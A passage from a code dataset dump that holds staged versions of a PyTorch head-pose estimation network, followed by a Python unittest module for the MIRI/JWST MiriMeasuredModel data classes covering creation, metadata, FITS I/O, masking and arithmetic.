torch.cat([x_p_b, x_y_b,\n x_r_b], 1), torch.cat([x_p_b_mp, x_y_b_mp, x_r_b_mp], 1), x_feat\n",
"step-3": "<mask token>\n\n\nclass ChannelAttention(nn.Module):\n <mask token>\n\n def forward(self, x):\n avg_out = self.fc(self.avg_pool(x))\n max_out = self.fc(self.max_pool(x))\n out = avg_out + max_out\n return self.sigmoid(out)\n\n\nclass SpatialAttention(nn.Module):\n\n def __init__(self, kernel_size=7):\n super(SpatialAttention, self).__init__()\n self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size // 2,\n bias=False)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n avg_out = torch.mean(x, dim=1, keepdim=True)\n max_out, _ = torch.max(x, dim=1, keepdim=True)\n x = torch.cat([avg_out, max_out], dim=1)\n x = self.conv1(x)\n return self.sigmoid(x)\n\n\nclass PYRModule(nn.Module):\n\n def __init__(self, inplanes, downsample=None):\n super(PYRModule, self).__init__()\n self.ca = ChannelAttention(inplanes)\n self.features = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)))\n\n def forward(self, x):\n x = self.ca(x) * x\n x = self.features(x)\n return x\n\n\nclass HPNet(nn.Module):\n\n def __init__(self):\n super(HPNet, self).__init__()\n self.faceModel = efn.from_pretrained('efficientnet-b4')\n self.planes_num = 1792\n self.cls_num = 66\n self.feature_1 = PYRModule(self.planes_num)\n self.feature_2 = PYRModule(self.planes_num)\n self.feature_3 = PYRModule(self.planes_num)\n self.idx_tensor = torch.FloatTensor(torch.range(0, self.cls_num - 1\n ) * 1).cuda()\n self.fc_b_1 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))\n self.fc_b_2 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))\n self.fc_b_3 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))\n self.max_pool_1 = nn.MaxPool1d(3)\n self.max_pool_2 = nn.MaxPool1d(3)\n self.max_pool_3 = nn.MaxPool1d(3)\n self.softmax = nn.Softmax(dim=2).cuda()\n self.sigmoid = nn.Sigmoid().cuda()\n\n def forward(self, faces):\n xFace = self.faceModel.extract_features(faces)\n x_p = self.feature_1(xFace)\n x_y = self.feature_2(xFace)\n x_r = self.feature_3(xFace)\n x_p = torch.flatten(x_p, 1)\n x_y = torch.flatten(x_y, 1)\n x_r = torch.flatten(x_r, 1)\n x_p_feat = torch.unsqueeze(x_p, 1)\n x_y_feat = torch.unsqueeze(x_y, 1)\n x_r_feat = torch.unsqueeze(x_r, 1)\n x_feat = torch.cat([x_p_feat, x_y_feat, x_r_feat], 1)\n x_p_b = self.fc_b_1(x_p)\n x_y_b = self.fc_b_2(x_y)\n x_r_b = self.fc_b_3(x_r)\n x_p_b = torch.unsqueeze(x_p_b, 1)\n x_y_b = torch.unsqueeze(x_y_b, 1)\n x_r_b = torch.unsqueeze(x_r_b, 1)\n x_p_b_mp = self.max_pool_1(x_p_b)\n x_y_b_mp = self.max_pool_2(x_y_b)\n x_r_b_mp = self.max_pool_3(x_r_b)\n x_p_pre = self.softmax(x_p_b)\n x_y_pre = self.softmax(x_y_b)\n x_r_pre = self.softmax(x_r_b)\n x_p = torch.sum(x_p_pre * self.idx_tensor, 2)\n x_y = torch.sum(x_y_pre * self.idx_tensor, 2)\n x_r = torch.sum(x_r_pre * self.idx_tensor, 2)\n return torch.cat([x_p, x_y, x_r], 1), torch.cat([x_p_b, x_y_b,\n x_r_b], 1), torch.cat([x_p_b_mp, x_y_b_mp, x_r_b_mp], 1), x_feat\n",
"step-4": "import argparse\nimport os\nimport shutil\nimport time, math\nfrom collections import OrderedDict\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nimport torch.utils.data\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport torchvision.models as models\nimport numpy as np\nimport torch.utils.model_zoo as model_zoo\nfrom torch.autograd.variable import Variable\nfrom .Resnets import *\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom efficientnet_pytorch import EfficientNet as efn\n\n\nclass ChannelAttention(nn.Module):\n\n def __init__(self, in_planes, ratio=16):\n super(ChannelAttention, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.max_pool = nn.AdaptiveMaxPool2d(1)\n self.fc = nn.Sequential(nn.Conv2d(in_planes, in_planes // 16, 1,\n bias=False), nn.ReLU(inplace=True), nn.Conv2d(in_planes // 16,\n in_planes, 1, bias=False))\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n avg_out = self.fc(self.avg_pool(x))\n max_out = self.fc(self.max_pool(x))\n out = avg_out + max_out\n return self.sigmoid(out)\n\n\nclass SpatialAttention(nn.Module):\n\n def __init__(self, kernel_size=7):\n super(SpatialAttention, self).__init__()\n self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size // 2,\n bias=False)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n avg_out = torch.mean(x, dim=1, keepdim=True)\n max_out, _ = torch.max(x, dim=1, keepdim=True)\n x = torch.cat([avg_out, max_out], dim=1)\n x = self.conv1(x)\n return self.sigmoid(x)\n\n\nclass PYRModule(nn.Module):\n\n def __init__(self, inplanes, downsample=None):\n super(PYRModule, self).__init__()\n self.ca = ChannelAttention(inplanes)\n self.features = nn.Sequential(nn.AdaptiveAvgPool2d((1, 1)))\n\n def forward(self, x):\n x = self.ca(x) * x\n x = self.features(x)\n return x\n\n\nclass HPNet(nn.Module):\n\n def __init__(self):\n super(HPNet, self).__init__()\n self.faceModel = efn.from_pretrained('efficientnet-b4')\n self.planes_num = 1792\n self.cls_num = 66\n self.feature_1 = PYRModule(self.planes_num)\n self.feature_2 = PYRModule(self.planes_num)\n self.feature_3 = PYRModule(self.planes_num)\n self.idx_tensor = torch.FloatTensor(torch.range(0, self.cls_num - 1\n ) * 1).cuda()\n self.fc_b_1 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))\n self.fc_b_2 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))\n self.fc_b_3 = nn.Sequential(nn.Linear(self.planes_num, self.cls_num))\n self.max_pool_1 = nn.MaxPool1d(3)\n self.max_pool_2 = nn.MaxPool1d(3)\n self.max_pool_3 = nn.MaxPool1d(3)\n self.softmax = nn.Softmax(dim=2).cuda()\n self.sigmoid = nn.Sigmoid().cuda()\n\n def forward(self, faces):\n xFace = self.faceModel.extract_features(faces)\n x_p = self.feature_1(xFace)\n x_y = self.feature_2(xFace)\n x_r = self.feature_3(xFace)\n x_p = torch.flatten(x_p, 1)\n x_y = torch.flatten(x_y, 1)\n x_r = torch.flatten(x_r, 1)\n x_p_feat = torch.unsqueeze(x_p, 1)\n x_y_feat = torch.unsqueeze(x_y, 1)\n x_r_feat = torch.unsqueeze(x_r, 1)\n x_feat = torch.cat([x_p_feat, x_y_feat, x_r_feat], 1)\n x_p_b = self.fc_b_1(x_p)\n x_y_b = self.fc_b_2(x_y)\n x_r_b = self.fc_b_3(x_r)\n x_p_b = torch.unsqueeze(x_p_b, 1)\n x_y_b = torch.unsqueeze(x_y_b, 1)\n x_r_b = torch.unsqueeze(x_r_b, 1)\n x_p_b_mp = self.max_pool_1(x_p_b)\n x_y_b_mp = self.max_pool_2(x_y_b)\n x_r_b_mp = self.max_pool_3(x_r_b)\n x_p_pre = self.softmax(x_p_b)\n x_y_pre = self.softmax(x_y_b)\n x_r_pre = self.softmax(x_r_b)\n x_p = torch.sum(x_p_pre * self.idx_tensor, 2)\n x_y = torch.sum(x_y_pre * self.idx_tensor, 2)\n x_r = torch.sum(x_r_pre * self.idx_tensor, 2)\n return torch.cat([x_p, x_y, x_r], 1), torch.cat([x_p_b, x_y_b,\n x_r_b], 1), torch.cat([x_p_b_mp, x_y_b_mp, x_r_b_mp], 1), x_feat\n",
"step-5": "import argparse\nimport os\nimport shutil\nimport time, math\nfrom collections import OrderedDict\nimport torch\nimport torch.nn as nn\nimport torch.nn.parallel\nimport torch.backends.cudnn as cudnn\nimport torch.optim\nimport torch.utils.data\nimport torchvision.transforms as transforms\nimport torchvision.datasets as datasets\nimport torchvision.models as models\nimport numpy as np\nimport torch.utils.model_zoo as model_zoo\nfrom torch.autograd.variable import Variable\nfrom .Resnets import *\nimport torch.nn.functional as F\nfrom torch.autograd import Variable\nfrom efficientnet_pytorch import EfficientNet as efn\n\n\nclass ChannelAttention(nn.Module):\n def __init__(self, in_planes, ratio=16):\n super(ChannelAttention, self).__init__()\n self.avg_pool = nn.AdaptiveAvgPool2d(1)\n self.max_pool = nn.AdaptiveMaxPool2d(1)\n \n self.fc = nn.Sequential(nn.Conv2d(in_planes, in_planes // 16, 1, bias=False),\n nn.ReLU(inplace=True),\n nn.Conv2d(in_planes // 16, in_planes, 1, bias=False))\n \n #self.fc = nn.Sequential(nn.Linear(in_planes, in_planes // 16, bias=False),\n # nn.ReLU(inplace=True),\n # nn.Linear(in_planes // 16, in_planes, bias=False))\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n #b, c, _, _ = x.size()\n avg_out = self.fc(self.avg_pool(x))\n max_out = self.fc(self.max_pool(x))\n out = avg_out + max_out\n return self.sigmoid(out)\n\nclass SpatialAttention(nn.Module):\n def __init__(self, kernel_size=7):\n super(SpatialAttention, self).__init__()\n\n self.conv1 = nn.Conv2d(2, 1, kernel_size, padding=kernel_size//2, bias=False)\n self.sigmoid = nn.Sigmoid()\n\n def forward(self, x):\n avg_out = torch.mean(x, dim=1, keepdim=True)\n max_out, _ = torch.max(x, dim=1, keepdim=True)\n x = torch.cat([avg_out, max_out], dim=1)\n x = self.conv1(x)\n return self.sigmoid(x)\n\n\nclass PYRModule(nn.Module):\n\n def __init__(self,inplanes,downsample=None):\n super(PYRModule, self).__init__()\n \n self.ca = ChannelAttention(inplanes)\n \n self.features = nn.Sequential(\n nn.AdaptiveAvgPool2d((1, 1)),\n )\n\n def forward(self, x):\n #residual =x\n x = self.ca(x) * x\n #x += residual\n x = self.features(x)\n return x\n\n\n\nclass HPNet(nn.Module):\n\n def __init__(self):\n super(HPNet, self).__init__()\n self.faceModel = efn.from_pretrained('efficientnet-b4')\n \n self.planes_num=1792#2304#2048#1536#1408#1280#1792\n self.cls_num=66\n \n self.feature_1 = PYRModule(self.planes_num)\n self.feature_2 = PYRModule(self.planes_num)\n self.feature_3 = PYRModule(self.planes_num)\n \n \n self.idx_tensor = torch.FloatTensor(torch.range(0,self.cls_num-1)*1).cuda()\n \n self.fc_b_1 = nn.Sequential(\n nn.Linear(self.planes_num, self.cls_num),\n )\n self.fc_b_2 = nn.Sequential(\n nn.Linear(self.planes_num, self.cls_num),\n )\n self.fc_b_3 = nn.Sequential(\n nn.Linear(self.planes_num, self.cls_num),\n )\n self.max_pool_1=nn.MaxPool1d(3)\n self.max_pool_2=nn.MaxPool1d(3)\n self.max_pool_3=nn.MaxPool1d(3)\n \n self.softmax=nn.Softmax(dim=2).cuda()\n self.sigmoid=nn.Sigmoid().cuda()\n \n \n def forward(self, faces):\n\n xFace = self.faceModel.extract_features(faces)\n \n \n x_p = self.feature_1(xFace)\n x_y = self.feature_2(xFace)\n x_r = self.feature_3(xFace)\n \n x_p = torch.flatten(x_p, 1)\n x_y = torch.flatten(x_y, 1)\n x_r = torch.flatten(x_r, 1)\n \n x_p_feat=torch.unsqueeze(x_p,1)\n x_y_feat=torch.unsqueeze(x_y,1)\n x_r_feat=torch.unsqueeze(x_r,1)\n \n x_feat=torch.cat([x_p_feat,x_y_feat,x_r_feat],1)\n \n x_p_b=self.fc_b_1(x_p)\n x_y_b=self.fc_b_2(x_y)\n x_r_b=self.fc_b_3(x_r)\n \n x_p_b=torch.unsqueeze(x_p_b,1)\n x_y_b=torch.unsqueeze(x_y_b,1)\n x_r_b=torch.unsqueeze(x_r_b,1)\n \n x_p_b_mp=self.max_pool_1(x_p_b)\n x_y_b_mp=self.max_pool_2(x_y_b)\n x_r_b_mp=self.max_pool_3(x_r_b)\n \n x_p_pre=self.softmax(x_p_b)\n x_y_pre=self.softmax(x_y_b)\n x_r_pre=self.softmax(x_r_b)\n \n x_p=torch.sum(x_p_pre * self.idx_tensor, 2) \n x_y=torch.sum(x_y_pre * self.idx_tensor, 2) \n x_r=torch.sum(x_r_pre * self.idx_tensor, 2)\n \n\n return torch.cat([x_p,x_y,x_r],1),torch.cat([x_p_b,x_y_b,x_r_b],1),torch.cat([x_p_b_mp,x_y_b_mp,x_r_b_mp],1),x_feat",
"step-ids": [
8,
10,
11,
13,
14
]
}
|
[
8,
10,
11,
13,
14
] |
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
Module test_measured_model - Contains the unit tests for the classes
in the datamodels.miri_measured_model module.
:History:
15 Jan 2013: Created.
21 Jan 2013: Warning messages controlled with Python warnings module.
05 Feb 2013: File closing problem solved by using "with" context manager.
08 Feb 2013: Replaced 'to_fits' with more generic 'save' method.
23 Apr 2013: Modified to keep up with behaviour of jwst_lib model.
Uninitialised arrays now have the same size and shape as the
data array but are full of default values.
26 Apr 2013: File closing problem has returned!
13 May 2013: Added MiriSlopeModel to describe MIRI slope data
(which is different from "ImageModel" data because it
preserves integrations). N.B. FINAL MODEL IS TBD.
04 Jun 2013: Shortened the names of the ramp, slope and image models.
10 Jun 2013: Added more metadata tests.
02 Jul 2013: MiriCubeModel added.
29 Jul 2013: stats() method added.
14 Aug 2013: Updated ramp model test to include groupdq and pixeldq
02 Sep 2013: Compare numpy record arrays in a way that it independent
of the byte ordering.
12 Sep 2013: Swapped the MRS CHANNEL and BAND keywords.
12 Sep 2013: Test that the data product can be copied successfully.
04 Oct 2013: Changed default field_def table to use MIRI reserved flags.
07 Oct 2013: GROUP_DEF table added to MIRI ramp data. Test MiriRampModel
for masking and arithmetic operations.
24 Feb 2014: Instrument name (INSTRUME) changed from meta.instrument.type to
meta.instrument.name.
27 Feb 2014: Added extra data arrays to MiriSlopeModel test.
04 Mar 2014: Added set_housekeeping_metadata.
25 Jun 2014: field_def and group_def changed to dq_def and groupdq_def.
field_def for ramp data changed to pixeldq_def.
21 Jul 2014: IM, and LW detectors changed to MIRIMAGE and MIRIFULONG.
25 Sep 2014: Updated the reference flags. insert_value_column function
used to convert between 3 column and 4 column flag tables.
TYPE and REFTYPE are no longer identical.
07 Nov 2014: The data model now raises an IOError when an invalid file
path is provided.
11 Mar 2015: group_integration_time changed to group_time.
11 Jun 2015: Added a history record test.
09 Jul 2015: Reference output array (refout) added to MiriRampModel schema.
19 Aug 2015: Removed MiriImageModel and MiriCubeModel.
07 Oct 2015: Made exception catching Python 3 compatible.
08 Apr 2016: Removed obsolete FIXME statements.
04 May 2016: ERR array removed from ramp data model.
31 Aug 2016: Change exception detected when creating a data model with an
invalid initialiser.
15 Jun 2017: Observation and target metadata is appropriate for ramp and
slope data only.
12 Jul 2017: Replaced "clobber" parameter with "overwrite".
13 Sep 2017: Updated "not a file name" test to match the new behaviour of
JWST pipeline version 0.7.8rc2
27 Apr 2018: Corrected bug in get_history() length test.
27 Jun 2018: Removed unused arrays.
15 Feb 2018: Check that the DQ_DEF table has the correct fieldnames.
@author: Steven Beard (UKATC)
"""
import os
import unittest
import warnings
import numpy as np
# Import the JWST master data quality flag definitions
from miri.datamodels.dqflags import master_flags, pixeldq_flags, \
groupdq_flags
from miri.datamodels.miri_measured_model import MiriMeasuredModel, \
MiriRampModel, MiriSlopeModel
from miri.datamodels.tests.util import assert_recarray_equal, \
assert_products_equal
class TestMiriMeasuredModel(unittest.TestCase):
# Test the MiriMeasuredModel class
def setUp(self):
# Create a 64x64 simple MiriMeasuredModel object, with no error
# or quality arrays.
self.data = np.linspace(0.0, 100000.0, 64*64)
self.data.shape = [64,64]
self.simpleproduct = MiriMeasuredModel(data=self.data)
# Add some example metadata.
self.simpleproduct.set_housekeeping_metadata('MIRI EC', 'Joe Bloggs',
'V1.0')
self.simpleproduct.set_instrument_metadata(detector='MIRIMAGE',
filt='F560W',
ccc_pos='OPEN',
deck_temperature=10.0,
detector_temperature=7.0)
self.simpleproduct.set_exposure_metadata(readpatt='SLOW',
nints=1, ngroups=10,
frame_time=30.0,
integration_time=30.0,
group_time=300.0,
reset_time=0, frame_resets=3)
# Create a more complex MiriMeasuredModel object from primary,
# error and quality arrays.
self.primary = [[10,20,30,40], [50,60,70,80], [90,100,110,120]]
self.error = [[1,2,3,4], [5,6,7,8], [9,10,11,12]]
self.quality = [[1,0,0,0], [0,1,0,1], [1,0,1,0]]
self.dataproduct = MiriMeasuredModel(data=self.primary,
err=self.error,
dq=self.quality,
dq_def=master_flags)
# Add some example metadata.
self.dataproduct.set_instrument_metadata(detector='MIRIFUSHORT',
channel='1',
ccc_pos='OPEN',
deck_temperature=11.0,
detector_temperature=6.0)
self.dataproduct.set_exposure_metadata(readpatt='FAST',
nints=1, ngroups=1,
frame_time=1.0,
integration_time=10.0,
group_time=10.0,
reset_time=0, frame_resets=3)
self.testfile1 = "MiriMeasuredModel_test1.fits"
self.testfile2 = "MiriMeasuredModel_test2.fits"
self.tempfiles = [self.testfile1, self.testfile2]
def tearDown(self):
# Tidy up
del self.dataproduct
del self.primary, self.error, self.quality
del self.simpleproduct
del self.data
# Remove temporary files, if they exist and if able to.
for tempfile in self.tempfiles:
if os.path.isfile(tempfile):
try:
os.remove(tempfile)
except Exception as e:
strg = "Could not remove temporary file, " + tempfile + \
"\n " + str(e)
warnings.warn(strg)
del self.tempfiles
def test_creation(self):
# Check that the DQ_DEF field names in the class variable are the same
# as the ones declared in the schema.
dq_def_names = list(MiriMeasuredModel.dq_def_names)
schema_names = list(self.dataproduct.get_field_names('dq_def'))
self.assertEqual(dq_def_names, schema_names,
"'dq_def_names' class variable does not match schema")
# Test that the error and quality arrays are optional.
a2 = [[10,20,30,40], [50,60,70,80], [90,100,110,120]]
b2 = [[1,2,3,4], [5,6,7,8], [9,10,11,12]]
c2 = [[1,0,0,0], [0,1,0,1], [1,0,1,0]]
# 1) Data array only. Data array must exist and be non-empty.
# Other arrays should exist and be the same size and shape as the
# data array. They should be full of default values.
newdp1 = MiriMeasuredModel(data=a2)
self.assertIsNotNone(newdp1.data)
self.assertGreater(len(newdp1.data), 0)
self.assertIsNotNone(newdp1.err)
self.assertEqual(newdp1.err.shape, newdp1.data.shape)
# Assumes default is 0.0 - see schema
self.assertAlmostEqual(np.mean(newdp1.err), 0.0)
self.assertIsNotNone(newdp1.dq)
self.assertEqual(newdp1.dq.shape, newdp1.dq.shape)
# Assumes default is 0 - see schema
self.assertEqual(np.mean(newdp1.dq), 0)
descr1 = str(newdp1)
self.assertIsNotNone(descr1)
del newdp1, descr1
# 2) Data and error arrays only. Data and error arrays must exist
# and be non-empty. Quality array should exist but be the same
# size and shape as the data array. It should be full of default
# values.
newdp2 = MiriMeasuredModel(data=a2, err=b2)
self.assertIsNotNone(newdp2.data)
self.assertGreater(len(newdp2.data), 0)
self.assertIsNotNone(newdp2.err)
self.assertEqual(newdp2.err.shape, newdp2.data.shape)
# The error array must not be full of default values.
self.assertNotAlmostEqual(np.mean(newdp2.err), 0.0)
self.assertIsNotNone(newdp2.dq)
self.assertEqual(newdp2.dq.shape, newdp2.dq.shape)
# Assumes default is 0 - see schema
self.assertEqual(np.mean(newdp2.dq), 0)
descr2 = str(newdp2)
self.assertIsNotNone(descr2)
del newdp2, descr2
# 3) Data, error and quality arrays. All arrays must exist,
# be non-empty and be the same size and shape.
newdp3 = MiriMeasuredModel(data=a2, err=b2, dq=c2)
self.assertIsNotNone(newdp3.data)
self.assertGreater(len(newdp3.data), 0)
self.assertIsNotNone(newdp3.err)
self.assertEqual(newdp3.err.shape, newdp3.data.shape)
# The error array must not be full of default values.
self.assertNotAlmostEqual(np.mean(newdp3.err), 0.0)
self.assertIsNotNone(newdp3.dq)
self.assertEqual(newdp3.dq.shape, newdp3.dq.shape)
# The quality array must not be full of default values.
self.assertNotEqual(np.mean(newdp3.dq), 0)
descr3 = str(newdp3)
self.assertIsNotNone(descr3)
del newdp3, descr3
# It should be possible to set up an empty data product with
# a specified shape. All three arrays should be initialised to
# the same shape.
emptydp = MiriMeasuredModel( (4,4) )
self.assertIsNotNone(emptydp.data)
self.assertEqual(emptydp.data.shape, (4,4))
self.assertIsNotNone(emptydp.err)
self.assertEqual(emptydp.err.shape, (4,4))
self.assertIsNotNone(emptydp.dq)
self.assertEqual(emptydp.dq.shape, (4,4))
descr = str(emptydp)
self.assertIsNotNone(descr)
del emptydp, descr
# A null data product can also be created and populated
# with data later.
nulldp = MiriMeasuredModel( )
descr1 = str(nulldp)
self.assertIsNotNone(descr1)
nulldp.data = np.asarray(a2)
self.assertIsNotNone(nulldp.err)
self.assertIsNotNone(nulldp.dq)
descr2 = str(nulldp)
self.assertIsNotNone(descr2)
del nulldp, descr1, descr2
# A scalar data product is possible, even if of little use.
scalardp = MiriMeasuredModel( data=42 )
self.assertEqual(scalardp.data, 42)
self.assertIsNotNone(scalardp.err)
self.assertIsNotNone(scalardp.dq)
descr = str(scalardp)
self.assertIsNotNone(descr)
del scalardp, descr
# Attempts to create a data product from invalid data types
# and stupid values must be detected.
# NOTE: A bug in the JWST data model might cause an AttributeError
# to be raised instead of a ValueError. If this happens, try a newer
# version of the JWST data model library.
self.assertRaises(ValueError, MiriMeasuredModel, init=[])
self.assertRaises(ValueError, MiriMeasuredModel, init=42)
self.assertRaises(ValueError, MiriMeasuredModel, init='not a file name')
self.assertRaises(IOError, MiriMeasuredModel, init='nosuchfile.fits')
#self.assertRaises(ValueError, MiriMeasuredModel, init='')
self.assertRaises(ValueError, MiriMeasuredModel, data='badstring')
def test_metadata(self):
# Check the dataproducts contain metadata
# First test the basic STScI FITS keyword lookup method.
kwstrg = self.simpleproduct.find_fits_keyword('TELESCOP',
return_result=True)
self.assertIsNotNone(kwstrg)
# kwstrg is a list - assume the first entry is what we want.
telname = self.simpleproduct[kwstrg[0]]
self.assertEqual(telname, 'JWST')
# Accessing the tree structure directly should also work.
telname = self.simpleproduct.meta.telescope
self.assertEqual(telname, 'JWST')
# An alternative lookup provided by the MIRI data model.
telname = self.simpleproduct.get_fits_keyword('TELESCOP')
self.assertEqual(telname, 'JWST')
kwstrg = self.simpleproduct.find_fits_keyword('INSTRUME',
return_result=True)
self.assertIsNotNone(kwstrg)
insname = self.simpleproduct[kwstrg[0]]
self.assertEqual(insname, 'MIRI')
insname = self.simpleproduct.meta.instrument.name
self.assertEqual(insname, 'MIRI')
insname = self.simpleproduct.get_fits_keyword('INSTRUME')
self.assertEqual(insname, 'MIRI')
# Add some history records and check they exist.
self.simpleproduct.add_history('History 1')
self.simpleproduct.add_history('History 2')
self.simpleproduct.add_history('History 3')
self.assertGreaterEqual(len(self.simpleproduct.get_history()), 3)
strg = self.simpleproduct.get_history_str()
self.assertIsNotNone(strg)
self.assertGreater(len(strg), 0)
def test_content(self):
# The data, err and dq attributes are aliases for the primary,
# error and quality arrays
self.assertTrue( np.allclose(self.primary, self.dataproduct.data) )
self.assertTrue( np.allclose(self.error, self.dataproduct.err) )
self.assertTrue( np.allclose(self.quality, self.dataproduct.dq) )
def test_copy(self):
# Test that a copy can be made of the data product.
datacopy = self.dataproduct.copy()
self.assertIsNotNone(datacopy)
assert_products_equal( self, self.dataproduct, datacopy,
arrays=['data', 'err', 'dq'],
tables='dq_def' )
del datacopy
def test_fitsio(self):
# Suppress metadata warnings
with warnings.catch_warnings():
warnings.simplefilter("ignore")
# Check that the data products can be written to a FITS
# file and read back again without changing the data.
self.simpleproduct.save(self.testfile1, overwrite=True)
with MiriMeasuredModel(self.testfile1) as readback:
self.assertTrue( np.allclose(self.simpleproduct.data,
readback.data) )
del readback
self.dataproduct.save(self.testfile2, overwrite=True)
with MiriMeasuredModel(self.testfile2) as readback:
assert_products_equal( self, self.dataproduct, readback,
arrays=['data', 'err', 'dq'],
tables='dq_def' )
del readback
def test_asciiio(self):
# Check that the data products can be written to an ASCII
# file and read back again without changing the data.
# TODO: At the moment jwst_lib only supports FITS I/O
pass
# # Suppress metadata warnings
# with warnings.catch_warnings():
# warnings.simplefilter("ignore")
# self.simpleproduct.save(self.testfile_ascii, overwrite=True)
# with MiriMeasuredModel(self.testfile_ascii) as readback:
# self.assertTrue( np.allclose(self.simpleproduct.data,
# readback.data) )
# del readback
def test_masking(self):
# The DQ array must mask off bad values in the SCI and ERR arrays.
a2 = [[10,999,10,999], [999,10,10,999], [10,10,999,10]]
b2 = [[1,99,1,99], [99,1,1,99], [1,1,99,1]]
c2 = [[0,1,0,1], [1,0,0,1], [0,0,1,0]]
# Without a DQ array (assuming the default quality value is 0)
# the SCI and ERR arrays are not masked, so their averages
# include the 999s and are greater than they ought to be.
newdp = MiriMeasuredModel(data=a2, err=b2)
meandata = np.mean(newdp.data_masked)
self.assertGreater(meandata, 10)
meanerr = np.mean(newdp.err_masked)
self.assertGreater(meanerr, 1)
# The addition of the quality data should cause the SCI and ERR
# arrays to be masked off and give the correct average.
newdp2 = MiriMeasuredModel(data=a2, err=b2, dq=c2)
meandata2 = np.mean(newdp2.data_masked)
self.assertAlmostEqual(meandata2, 10)
meanerr2 = np.mean(newdp2.err_masked)
self.assertAlmostEqual(meanerr2, 1)
del newdp, newdp2
def test_arithmetic(self):
a2 = [[90,80,70,60],[50,40,30,20],[10,0,-10,-20]]
b2 = [[1,2,3,4],[5,6,7,8],[9,10,11,12]]
c2 = [[0,1,1,0],[0,2,0,2],[1,0,1,0]]
newdp = MiriMeasuredModel(data=a2, err=b2, dq=c2)
# Self-subtraction of the simple product. The result
# should be zero.
newsimple = self.simpleproduct - self.simpleproduct
self.assertAlmostEqual(newsimple.data.all(), 0.0)
del newsimple
# Scalar addition
result = self.dataproduct + 42
test1 = self.dataproduct.data + 42
test2 = result.data
self.assertEqual(test1.all(), test2.all())
del result
# Data product addition
result = self.dataproduct + newdp
test1 = self.dataproduct.data + newdp.data
test2 = result.data
self.assertEqual(test1.all(), test2.all())
# Test that error arrays are combined properly - at least for
# a couple of unmasked points.
expectedsq = self.error[1][0]*self.error[1][0] + b2[1][0]*b2[1][0]
actualsq = result.err[1,0]*result.err[1,0]
self.assertAlmostEqual(expectedsq, actualsq)
expectedsq = self.error[2][1]*self.error[2][1] + b2[2][1]*b2[2][1]
actualsq = result.err[2,1]*result.err[2,1]
self.assertAlmostEqual(expectedsq, actualsq)
del result
# Scalar subtraction
result = self.dataproduct - 42
test1 = self.dataproduct.data - 42
test2 = result.data
self.assertEqual(test1.all(), test2.all())
del result
# Data product subtraction
result = self.dataproduct - newdp
test1 = self.dataproduct.data - newdp.data
test2 = result.data
self.assertEqual(test1.all(), test2.all())
# Test that error arrays are combined properly - at least for
# a couple of unmasked points.
expectedsq = self.error[1][0]*self.error[1][0] + b2[1][0]*b2[1][0]
actualsq = result.err[1,0]*result.err[1,0]
self.assertAlmostEqual(expectedsq, actualsq)
expectedsq = self.error[2][1]*self.error[2][1] + b2[2][1]*b2[2][1]
actualsq = result.err[2,1]*result.err[2,1]
self.assertAlmostEqual(expectedsq, actualsq)
del result
# Addition and subtraction should cancel each other out
result = self.dataproduct + newdp - newdp
test1 = self.dataproduct.data
test2 = result.data
self.assertEqual(test1.all(), test2.all())
del result
# Scalar multiplication
result = self.dataproduct * 3
test1 = self.dataproduct.data * 3
test2 = result.data
self.assertEqual(test1.all(), test2.all())
del result
# Data product multiplication
result = self.dataproduct * newdp
test1 = self.dataproduct.data * newdp.data
test2 = result.data
self.assertEqual(test1.all(), test2.all())
err1 = self.dataproduct.err
da1 = self.dataproduct.data
err2 = newdp.err
da2 = newdp.data
expectedErr = np.sqrt(err1 * err1 * da2 * da2 + err2 * err2 * da1 * da1)
self.assertTrue(np.array_equal(expectedErr, result.err))
del result, da1, da2, err1, err2, expectedErr
# Scalar division
result = self.dataproduct / 3.0
test1 = self.dataproduct.data / 3.0
test2 = result.data
self.assertAlmostEqual(test1.all(), test2.all())
del test1, test2, result
# Division by zero
self.assertRaises(ValueError, self.dataproduct.__truediv__, 0.0)
# Data product division
#print("NOTE: The following test is expected to generate run time warnings.")
with warnings.catch_warnings():
warnings.simplefilter("ignore")
result = self.dataproduct / newdp
test1 = self.dataproduct.data / newdp.data
test2 = result.data
self.assertEqual(test1.all(), test2.all())
# Test Juergen Schreiber error propagation
dat = self.dataproduct.data[1][1]
newdat = newdp.data[1][1]
resultErr = result.err[1][1]
dpErr = self.dataproduct.err[1][1]
newdpErr = newdp.err[1][1]
expectErr = np.sqrt( dpErr * dpErr/(newdat * newdat) + \
newdpErr * newdpErr * dat * dat / \
(newdat * newdat * newdat * newdat))
self.assertEqual(expectErr, resultErr)
del test1, test2, result
# More complex arithmetic should be possible.
newdp2 = newdp * 2
newdp3 = newdp * 3
newdp4 = newdp2 + newdp3
result = ((self.dataproduct - newdp) * newdp2 / newdp3) + newdp4
del newdp, newdp2, newdp3, newdp4
del result
def test_broadcasting(self):
# Test that operations where the broadcasting of one array
# onto a similar shaped array work.
a4x3 = [[90,80,70,60],[50,40,30,20],[10,0,-10,-20]]
b4x3 = [[1,2,3,4],[5,6,7,8],[9,10,11,12]]
#c4x3 = [[0,1,0,0],[0,0,1,0],[1,0,0,1]]
a4x1 = [4,3,2,1]
b4x1 = [1,2,1,2]
c4x1 = [0,1,0,0]
#a5x1 = [5,4,3,2,1]
#b5x1 = [1,2,3,2,1]
c5x1 = [0,1,0,0,1]
# Create an object with 4x3 primary and error arrays but a 4x1
# quality array. This should succeed because the quality array
# is broadcastable.
newdp1 = MiriMeasuredModel(data=a4x3, err=b4x3, dq=c4x1)
self.assertTrue( np.allclose(a4x3, newdp1.data) )
self.assertTrue( np.allclose(b4x3, newdp1.err) )
